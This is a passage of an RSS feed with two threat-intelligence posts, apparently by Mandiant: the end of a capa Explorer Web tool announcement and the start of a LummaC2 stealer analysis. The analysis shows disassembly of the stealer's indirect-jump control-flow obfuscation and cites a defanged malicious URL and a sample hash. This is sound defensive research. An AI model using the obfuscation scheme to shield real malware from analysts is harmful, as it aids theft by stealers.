and you can start analyzing capa results immediately (see Figure 2). For offline usage, you can download a standalone HTML file from the website. 
Similar to CyberChef, it is an HTML file that can be opened locally in a browser and works without an Internet connection.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig2.max-1000x1000.png" alt="capa Explorer Web home page"> </a> <figcaption class="article-image__caption "><p data-block-key="65h86">Figure 2: capa Explorer Web home page</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">To generate a capa result document, follow these quick steps to get started:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><a href="https://github.com/mandiant/capa/blob/master/doc/installation.md" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Install capa</span></a><span style="vertical-align: baseline;">, e.g. 
download the latest </span><a href="https://github.com/mandiant/capa/releases" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">standalone executable release</span></a></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Analyze a sample and save the JSON results: </span><code style="vertical-align: baseline;">capa.exe -j /path/to/file &gt; result.json</code></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Load the JSON results file into capa Explorer Web</span></p> </li> </ol> <h3><span style="vertical-align: baseline;">Loading capa Results</span></h3> <p><span style="vertical-align: baseline;">capa Explorer Web allows you to load capa result documents from local JSON files, including Gzipped files. All processing occurs in your browser – no data is transferred to any server.</span></p> <h3><span style="vertical-align: baseline;">Default Table View Showing Rule Match Details</span></h3> <p><span style="vertical-align: baseline;">The default web UI displays identified program capabilities in a rule match table. Users can expand, sort, filter, and search rule match details (see Figure 3). This enables analysts to triage samples faster. The table shows detailed information for each rule match – including matched features and their addresses. 
Users can also view and filter on rule meta information like namespaces, associated </span><a href="https://attack.mitre.org/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK</span></a><span style="vertical-align: baseline;"> techniques, and </span><a href="https://github.com/MBCProject/mbc-markdown#malware-objective-descriptions" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Malware Behavior Catalog classifications (MBC)</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Figure 3 illustrates how an analyst can use capa Explorer Web to study the details of a rule match. Expanding the “inject APC” match row shows which features capa identified including their location in the program. This insight can streamline the identification of key behaviors and further support additional analysis – for example, when inspecting sandbox traces, debugging a sample, or analyzing the disassembled file.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig3.max-1000x1000.png" alt="Static analysis results in capa Explorer Web"> </a> <figcaption class="article-image__caption "><p data-block-key="c4dce">Figure 3: Static analysis results in capa Explorer Web</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Figure 4 demonstrates how analysts can leverage capa's dynamic analysis results to identify suspicious processes which exhibit malicious behavior. 
For instance, the process "explorer.exe" (a seemingly benign name) is shown invoking the </span><code style="vertical-align: baseline;">InternetCrackUrl</code><span style="vertical-align: baseline;"> API with potentially malicious URLs as arguments, such as hxxps://216.201.159[.]118:443/cHOPH1oQ.php. This noteworthy functionality hints at possible process injection, and here even provides potential network-based indicators for further analysis.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig4.max-1000x1000.png" alt="Dynamic analysis results in capa Explorer Web"> </a> <figcaption class="article-image__caption "><p data-block-key="fordu">Figure 4: Dynamic analysis results in capa Explorer Web</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Rule Match Context</span></h3> <p><span style="vertical-align: baseline;">Via right-click on a match row users can access additional explorer functionality. This includes viewing the rule source definition as shown in Figure 5, opening the rule definition in the </span><a href="https://mandiant.github.io/capa/rules/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">capa rules website</span></a><span style="vertical-align: baseline;">, or searching for samples with this capability in VirusTotal to gain broader threat intelligence insights. 
The VirusTotal lookup requires a premium account.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig5.max-1000x1000.png" alt="Inspecting the source logic via the rule match context menu"> </a> <figcaption class="article-image__caption "><p data-block-key="fordu">Figure 5: Inspecting the source logic via the rule match context menu</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Alternative Views Grouping Functions and Processes</span></h3> <p><span style="vertical-align: baseline;">The function and process capability views in capa Explorer Web offer granular insights into program functionality, organized by their location within the analyzed sample. For static analysis results, the function capabilities view groups rule matches by function address, allowing reverse engineers to quickly identify functions with key behavior (see Figure 6).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig6.max-1000x1000.png" alt="Static analysis results grouped by function"> </a> <figcaption class="article-image__caption "><p data-block-key="1hczt">Figure 6: Static analysis results grouped by function</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">For dynamic analysis results, the process capabilities view organizes matches by process in a tree structure, showing Process ID (PID) and Parent Process ID (PPID) information (see 
Figure 7). Hovering a process column shows the respective rule matches.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig7.max-1000x1000.png" alt="Dynamic analysis results grouped by process"> </a> <figcaption class="article-image__caption "><p data-block-key="1hczt">Figure 7: Dynamic analysis results grouped by process</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Integrating capa Explorer Web with VirusTotal </span></h2> <p><span style="vertical-align: baseline;">capa </span><a href="https://blog.virustotal.com/2023/01/mandiants-capa-goresym-to-reinforce-vts.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">has been integrated as part of VirusTotal's analysis</span></a><span style="vertical-align: baseline;"> since January 2023. Our new UI integration enables users to explore capa results directly from VirusTotal. With this you do not need to acquire a sample or analyze it locally with capa. To open capa Explorer Web from VirusTotal navigate to: </span><strong style="vertical-align: baseline;">Behavior</strong><span style="vertical-align: baseline;"> &gt; </span><strong style="vertical-align: baseline;">Download Artifacts</strong><span style="vertical-align: baseline;"> &gt; </span><strong style="vertical-align: baseline;">Open in CAPA Explorer</strong><span style="vertical-align: baseline;"> (see Figure 8) or use </span><strong style="vertical-align: baseline;">Open in CAPA explorer</strong><span style="vertical-align: baseline;"> next to Capabilities (see Figure 9). 
Currently, this feature requires a premium VirusTotal subscription.</span></p> <p><span style="vertical-align: baseline;">Note that not all files have capa analysis results available. capa currently only supports analysis of non-corrupted PE, .NET, and ELF x86/x64 executables.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-web-explorer-fig8a.max-1000x1000.png" alt="Access capa Explorer Web analysis from VirusTotal"> </a> <figcaption class="article-image__caption "><p data-block-key="1hczt">Figure 8: Access capa Explorer Web analysis from VirusTotal</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig9.max-1000x1000.png" alt="Alternative link to open capa Explorer Web analysis from VirusTotal"> </a> <figcaption class="article-image__caption "><p data-block-key="1hczt">Figure 9: Alternative link to open capa Explorer Web analysis from VirusTotal</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When reviewing a new sample on VirusTotal, an analyst can pivot directly into capa Explorer Web to identify interesting locations within the program. 
This workflow allows prioritization of functions for deeper code analysis in the preferred reverse engineering tool.</span></p> <h2><span style="vertical-align: baseline;">Future Work</span></h2> <p><span style="vertical-align: baseline;">For future enhancements of <a href="https://mandiant.github.io/capa/explorer/" rel="noopener" target="_blank">capa Explorer Web</a>, we plan to first </span><a href="https://github.com/mandiant/capa/issues/2357" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">enhance the process tree view</span></a><span style="vertical-align: baseline;"> mode to improve visualization of per-process matches. Additionally, we are considering new views to </span><a href="https://github.com/mandiant/capa/issues/1907" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">include extracted Indicators of Compromise</span></a><span style="vertical-align: baseline;"> (IoCs) for dynamic analysis. This could display extracted indicators such as URLs, file paths, and registry keys to further enhance the triage process. We are looking forward to your feedback and suggestions. Please reach out via our </span><a href="https://github.com/mandiant/capa/issues" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">GitHub issues</span></a><span style="vertical-align: baseline;"> page.</span></p> <h2><span style="vertical-align: baseline;">Soufiane’s Google Summer of Code Acknowledgement</span></h2> <p><span style="vertical-align: baseline;">Working on Google Summer of Code 2024 expanded my technical skills significantly: I learned new programming languages and frameworks, improved my code review skills, and gained practical experience with CI/CD practices and software distribution.</span> <span style="vertical-align: baseline;">I’d like to thank my mentors for supporting me throughout the whole project. 
They have been very helpful from the get-go. This project wouldn’t have gone smoothly without their feedback and encouragement.</span></p> <p><span style="vertical-align: baseline;">For future (GSoC) contributors, I recommend: dive deep into the existing codebase, don't hesitate to ask questions, and always share your thoughts with the other collaborators. I'm anticipating the continued evolution of capa and other open source tools. Whether through implementing new features, improving performance, extending file format support, or enhancing visualizations and integrations with other reverse engineering tools; the potential for growth is quite exciting and you can take part in it.</span></p></div></description><pubDate>Tue, 01 Oct 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/capa-explorer-web-program-capability-analysis/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>capa Explorer Web: A Web-Based Tool for Program Capability Analysis</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/capa-explorer-web-program-capability-analysis/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>LummaC2: Obfuscation Through Indirect Control Flow</title><link>https://cloud.google.com/blog/topics/threat-intelligence/lummac2-obfuscation-through-indirect-control-flow/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Nino Isakovic, Chuong Dong</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Overview</span></h2> <p><span style="vertical-align: baseline;">This blog post delves into the analysis of a control flow obfuscation technique employed by recent </span><a 
href="https://www.virustotal.com/gui/collection/malpedia_win_lumma" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">LummaC2 (LUMMAC.V2) stealer</span></a><span style="vertical-align: baseline;"> samples. In addition to the traditional </span><a href="https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/#control-flow-flattening" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">control flow flattening technique</span></a><span style="vertical-align: baseline;"> used in older versions, the malware now leverages customized control flow indirection to manipulate the execution of the malware. This technique thwarts all binary analysis tools including IDA Pro and Ghidra, significantly hindering not only the reverse engineering process, but also automation tooling designed to capture execution artifacts and generate detections.</span></p> <p><span style="vertical-align: baseline;">To provide insights to Google and Mandiant security teams, we developed an automated method for removing this protection layer through symbolic backward slicing. By leveraging the recovered control flow, we are able to rebuild and deobfuscate the samples into a format readily consumable for any static binary analysis platform.</span></p> <h2><span style="vertical-align: baseline;">Protection Components</span></h2> <h3><span style="vertical-align: baseline;">Overview</span></h3> <p><span style="vertical-align: baseline;">An obfuscating compiler, which we will also informally refer to as an "obfuscator," is a transformation tool designed to enhance the security of software binaries by making them more resilient to binary analysis. It operates by transforming a given binary into a protected representation, thereby increasing the difficulty for the code to be analyzed or tampered with. 
These transformations are typically applied on a per-function basis, where the user selects the specific functions to protect.</span></p> <p><span style="vertical-align: baseline;">Obfuscating compilers are distinct from packers, although they may incorporate packing techniques as part of their functionality. They fall under the broader classification of software protections, such as OLLVM, VMProtect, and Code Virtualizer, which provide comprehensive code transformation and protection mechanisms beyond simple packing. Notably, for all protected components, the original code is never exposed in its unprotected form at any point during the runtime of a protected binary. It is also common for obfuscating compilers to mix the original compiler-generated code with obfuscator-introduced code. This generally means an analyst needs a comprehensive deobfuscator in order to analyze the binary.</span></p> <p><span style="vertical-align: baseline;">The obfuscator employed by LummaC2 applies a multitude of transformations consistent with standard obfuscating compiler technology. This post focuses only on the newly introduced control flow protection scheme that we uncovered.</span></p> <p><span style="vertical-align: baseline;">Our analysis strongly suggests that the authors of the obfuscator have intimate knowledge of the LummaC2 stealer. Certain parts of the protection, as described in the upcoming sections, are specialized to handle specific components of the LummaC2 stealer.</span></p> <h3><span style="vertical-align: baseline;">Dispatcher Blocks</span></h3> <p><span style="vertical-align: baseline;">The obfuscator transforms the control flow of a protected function into one guided by "dispatcher blocks," each consisting of a subset of the original instructions that constituted the unprotected function and the new instructions introduced by the obfuscator. 
Each dispatcher block ends with an indirect jump that branches to a dynamically-resolved destination stored in a register or memory address. The result transforms the function's original linear control flow into a disjointed series of scattered blocks. Each block is isolated, containing only the runtime logic necessary to transfer execution to its immediate successor block.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig1.max-1000x1000.png" alt="Dispatcher blocks overview"> </a> <figcaption class="article-image__caption "><p data-block-key="lfzh6">Figure 1: Dispatcher blocks overview</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We refer to all instructions generated by the obfuscator as "dispatcher instructions" to differentiate them from "original instructions." Dispatcher blocks used by the obfuscator can be categorized into two main types: unconditional and conditional dispatchers.</span></p> <ul> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Unconditional dispatcher</strong><span style="vertical-align: baseline;">: This dispatcher</span><span style="vertical-align: baseline;"> type protects the majority of instructions in an obfuscated function. 
It consists of dispatcher instructions that fetch encoded offsets from a lookup table in the </span><code><span style="vertical-align: baseline;">.data</span></code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">section and perform ADD and XOR operations on them to calculate the next destination to transfer execution to.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Conditional dispatcher: </strong><span style="vertical-align: baseline;">This dispatcher type protects either individual conditional jump instructions (e.g., </span><code><span style="vertical-align: baseline;">jne</span></code><span style="vertical-align: baseline;"> or </span><code><span style="vertical-align: baseline;">ja</span></code><span style="vertical-align: baseline;">)</span><span style="vertical-align: baseline;"> or basic blocks that end with a conditional jump. 
</span><span style="vertical-align: baseline;">Instead of a single encoded offset to calculate and transfer execution to, the conditional dispatcher fetches one of two possible encoded offsets depending on the result of the condition to test.</span></p> </li> </ul> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig2.max-1000x1000.png" alt="Dispatcher block types"> </a> <figcaption class="article-image__caption "><p data-block-key="lfzh6">Figure 2: Dispatcher block types</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Conditional and unconditional dispatcher blocks are further categorized based on the distinct characteristics and layout of dispatcher instructions.</span></p> <ul> <li role="presentation"><strong style="vertical-align: baseline;">Register-based dispatcher: </strong><span style="vertical-align: baseline;">All calculations from dispatcher instructions operate solely on registers and always constitute the remaining instructions of the basic block.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Memory-based dispatcher: </strong><span style="vertical-align: baseline;">Dispatcher instructions operate on both registers and stack values for calculating the final jump destination and are also always the remaining instructions within the basic block.</span></li> <li><strong style="vertical-align: baseline;">Mixed-order dispatcher:</strong><span style="vertical-align: baseline;"> A variant of register-based and memory-based dispatchers. 
In this layout, the dispatcher instructions are interleaved with the original instructions they protect instead of being placed at the end of the block.</span></li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig3.max-1000x1000.png" alt="Obfuscating compiler dispatcher layouts"> </a> <figcaption class="article-image__caption "><p data-block-key="by1mg">Figure 3: Obfuscating compiler dispatcher layouts</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Dispatcher blocks can also exist standalone where they do not protect any original code. In such cases, they act as a single step responsible for continuing the control flow. </span></p> <h3><span style="vertical-align: baseline;">Register-based Dispatcher Layout</span></h3> <p><span style="vertical-align: baseline;">Using the following LummaC2 sample with MD5 hash </span><code><span style="vertical-align: baseline;">205e45e123aea66d444feaba9a846748</span></code><span style="vertical-align: baseline;"> from the </span><a href="https://www.virustotal.com/gui/collection/fde9be4abcbec24b6f5c47fb819c0d9adeb84e5113a4b5058142350ae58f7a95" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence collection here</span></a><span style="vertical-align: baseline;"> as a case study, we find that 1,981 of the 2,009 dispatcher blocks processed are register-based, making this the most common dispatcher layout. 
This layout is applied to both conditional and unconditional dispatcher types that occur in any protected function.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>00416630 mov eax, off_457C8C      ; Retrieve CONSTANT1 from .data section
00416635 mov ecx, 22A7266Eh       ; Populate CONSTANT2
0041663A xor ecx, dword_457C94    ; XOR CONSTANT2 with CONSTANT3
                                  ; from the .data section
00416640 add eax, ecx             ; ADD CONSTANT1 with the result
00416642 inc eax                  ; Increment the result
00416643 jmp eax                  ; Jump to the result</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 4: </span><span style="vertical-align: baseline;">Register-based instruction dispatcher</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">By analyzing dispatcher blocks of this layout, we can derive some key characteristics of the protection. These blocks typically include </span><code><span style="vertical-align: baseline;">mov</span></code><span style="vertical-align: baseline;"> instructions to fetch a value from the malware's <code>.data</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">section or populate the register with a constant. Next, an </span><code><span style="vertical-align: baseline;">xor/lea</span></code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction and an <code>inc</code></span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">instruction perform arithmetic operations on the retrieved values. 
Finally, the dispatcher block ends with a </span><code><span style="vertical-align: baseline;">jmp</span></code><span style="vertical-align: baseline;"> instruction to branch to the dynamically calculated value stored in a register.</span></p> <p><span style="vertical-align: baseline;">This final indirect jump obfuscates the function's original control flow. It breaks the control flow recovery algorithms of tools like IDA Pro, which cannot resolve the jump destination statically, hindering both disassembly and decompilation.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/lummac2-obfuscation-fig5.max-1000x1000.png" alt="IDA Pro&#x27;s disassembly and decompiler views of a protected subroutine"> </a> <figcaption class="article-image__caption "><p data-block-key="f6ha3">Figure 5: IDA Pro's disassembly and decompiler views of a protected subroutine</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">By identifying the common patterns within these dispatcher instructions, it's possible to differentiate them from the function's core instructions, which is crucial for lifting the protection and deobfuscating the function.</span></p> <p><span style="vertical-align: baseline;">Another observation is that the obfuscator produces duplicated original instructions when injecting its dispatcher instructions. Our assumption is that the obfuscator does not want to reallocate original instruction blocks when injecting the dispatcher code. 
As a result, it resolves this by copying those instructions to a new block at the destination.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0041665A push 0FFFFFFF6h           ; Duplicated instruction
0041665C call ds:GetStdHandle      ; Duplicated instruction
00416662 call sub_41A4A0           ; Duplicated instruction
00416667 push 0FFFFFFF6h           ; Original instruction. Last dispatcher
                                   ; block will jump here
00416669 call ds:GetStdHandle      ; Original instruction of next block
0041666F call sub_41A4A0           ; Original instruction of next block
00416674 mov ecx, off_457CB0       ; Next dispatcher instructions
0041667A mov edx, 9148854h
0041667F xor edx, dword_457CB4
00416685 add ecx, edx
00416687 inc ecx
00416688 jmp ecx</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 6: Duplicated instructions between two dispatcher blocks</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Memory-based Dispatcher Layout</span></h3> <p><span style="vertical-align: baseline;">Memory-based dispatcher blocks appear significantly less frequently, as there are only 28 dispatchers of this type in the 2,009 blocks processed. Unlike the register-based layout, this layout relies on both registers and stack values for calculating and jumping to the destination. 
An example of this layout is shown in </span><span style="vertical-align: baseline;">Figure 7</span><span style="vertical-align: baseline;">, where the </span><code><span style="vertical-align: baseline;">add</span></code><span style="vertical-align: baseline;"> dispatcher instruction adds a value stored on the stack to a register.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0044AA3A mov edi, [esi+50h]            ; esi = esp in previous instruction
0044AA3D cmp edi, [esi+98h]
0044AA43 setb bl
0044AA46 mov edi, off_46C030[ebx*4]
0044AA4D add edi, [esi+9Ch]            ; Dispatcher instruction. Adding a stack
                                       ; value to edi (jump destination)
0044AA53 mov ebx, [esi+0A0h]
0044AA59 jmp edi                       ; Jumping to edi</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 7: </span><span style="vertical-align: baseline;">Dispatcher utilizing stack values to calculate the indirect jump's destination</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In a smaller number of cases, we encounter dispatcher blocks of this layout ending with a </span><code><span style="vertical-align: baseline;">jmp</span></code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;"> instruction that does not branch to a register value. 
Instead, it utilizes a value stored on the stack to determine the jump target.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>0041CCB4 mov eax, [esi+5Ch]
0041CCB7 mov [eax], edi
0041CCB9 jmp dword ptr [esi+14h]      ; Dispatcher jump to a stack value</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 8: </span><span style="vertical-align: baseline;">Dispatcher with memory-based indirect jump</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Mixed-order Dispatcher Layout</span></h3> <p><span style="vertical-align: baseline;">The mixed-order dispatcher layout is a variant of the register-based and memory-based dispatcher layouts. There are 12 memory-based and 28 register-based dispatcher blocks that fall into this mixed-order category.</span></p> <p><span style="vertical-align: baseline;">Most dispatcher instructions are placed at the tail of an original instruction or a sequence of original instructions. However, this can vary: parts of the dispatcher block can also be split up and randomly interleaved with the original instructions. 
This unpredictable placement adds another layer of complexity to the deobfuscation process.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Dispatcher instructions:
0041E847 mov eax, 0F5A88CDAh        ; Dispatcher instruction
0041E84C xor eax, dword_459880      ; Dispatcher instruction
0041E852 mov ecx, off_459878        ; Dispatcher instruction
0041E858 add eax, ecx               ; Dispatcher instruction
0041E85A inc eax                    ; Dispatcher instruction

Original instructions:
0041E85B mov ebx, [esi+48h]
0041E85E mov ecx, [ebp+10h]
0041E861 mov [ebx], ecx
0041E863 mov edi, [esi+2Ch]
0041E866 mov ecx, [ebp+0Ch]
0041E869 mov [edi], ecx
0041E86B mov edi, [esi+0Ch]
0041E86E mov ecx, [esi+20h]
0041E871 mov dword ptr [edi], 0
0041E877 mov dword ptr [ecx], 0
0041E87D xorps xmm0, xmm0
0041E880 movups xmmword ptr [edx+4], xmm0
0041E884 movups xmmword ptr [edx+14h], xmm0
0041E888 movups xmmword ptr [edx+24h], xmm0
0041E88C mov dword ptr [edx+38h], 0
0041E893 mov dword ptr [edx+34h], 0
0041E89A mov dword ptr [edx], 3Ch
0041E8A0 mov dword ptr [edx+8], 0FFFFFFFFh
0041E8A7 mov dword ptr [edx+14h], 0FFFFFFFFh
0041E8AE mov dword ptr [edx+30h], 0FFFFFFFFh
---------------------------------------------------
0041E8B5 jmp eax                    ; Indirect jump</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 9: </span><span style="vertical-align: baseline;">Mixed-order dispatcher example</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Conditional Dispatcher</span></h3> <p><span style="vertical-align: baseline;">Conditional dispatchers deserve extra attention as they introduce more logic than unconditional ones. It is also important to note that not all conditional branches are obfuscated. 
We have identified 379 such instances within the case study sample that remain in their original state. These occur in the context of tight loops and heavy string processing routines. They are likely left out of the protection scheme because of the severe performance degradation that protecting them would induce.</span></p> <p><span style="vertical-align: baseline;">The structure of conditional dispatcher blocks exhibits a slight variation from that of unconditional dispatchers. Given that the intent is to protect conditional logic, there will always be two possible outcomes:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The branch that satisfies the condition being taken</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The fallthrough branch that does not satisfy the condition being taken</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The obfuscator employs a table of paired entries for each conditional branch that is indexed by the result of the condition, which is either false or true (0 or 1). 
Each index corresponds to one of the two branches that can be taken.</span></p> <p><span style="vertical-align: baseline;">Conditional dispatchers fall into three distinct categories.</span></p> <ol> <li role="presentation"><strong><span style="vertical-align: baseline;">Standard conditional logic</span></strong> <ul> <li role="presentation">The obfuscator accounts for all common<span style="vertical-align: baseline;"> conditional jump conditions</span></li> <li role="presentation">The condition code is evaluated using one of the following instructions: <ul> <li role="presentation"><code><span style="vertical-align: baseline;">test &lt;reg&gt;</span>, <span style="vertical-align: baseline;">&lt;reg&gt;</span></code></li> <li role="presentation"><code><span style="vertical-align: baseline;">cmp &lt;reg&gt;</span>,<span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">&lt;imm&gt;</span></code></li> </ul> </li> <li role="presentation"><a href="https://www.felixcloutier.com/x86/setcc" rel="noopener" target="_blank"><code><span style="text-decoration: underline; vertical-align: baseline;">setcc</span></code></a><span style="vertical-align: baseline;"> is then used to capture the original conditional jump logic. That is to say, every original conditional jump instruction is reflected as its </span><code><span style="vertical-align: baseline;">setcc</span></code><span style="vertical-align: baseline;"> counterpart (e.g., a </span><code><span style="vertical-align: baseline;">jnz</span></code><span style="vertical-align: baseline;"> becomes a </span><code><span style="vertical-align: baseline;">setnz</span></code><span style="vertical-align: baseline;">)</span></li> </ul> </li> <li role="presentation"><strong><span style="vertical-align: baseline;">Loop logic</span></strong> <ul> <li role="presentation">Non-infinite loops require conditional logic as a means of exiting the loop body. 
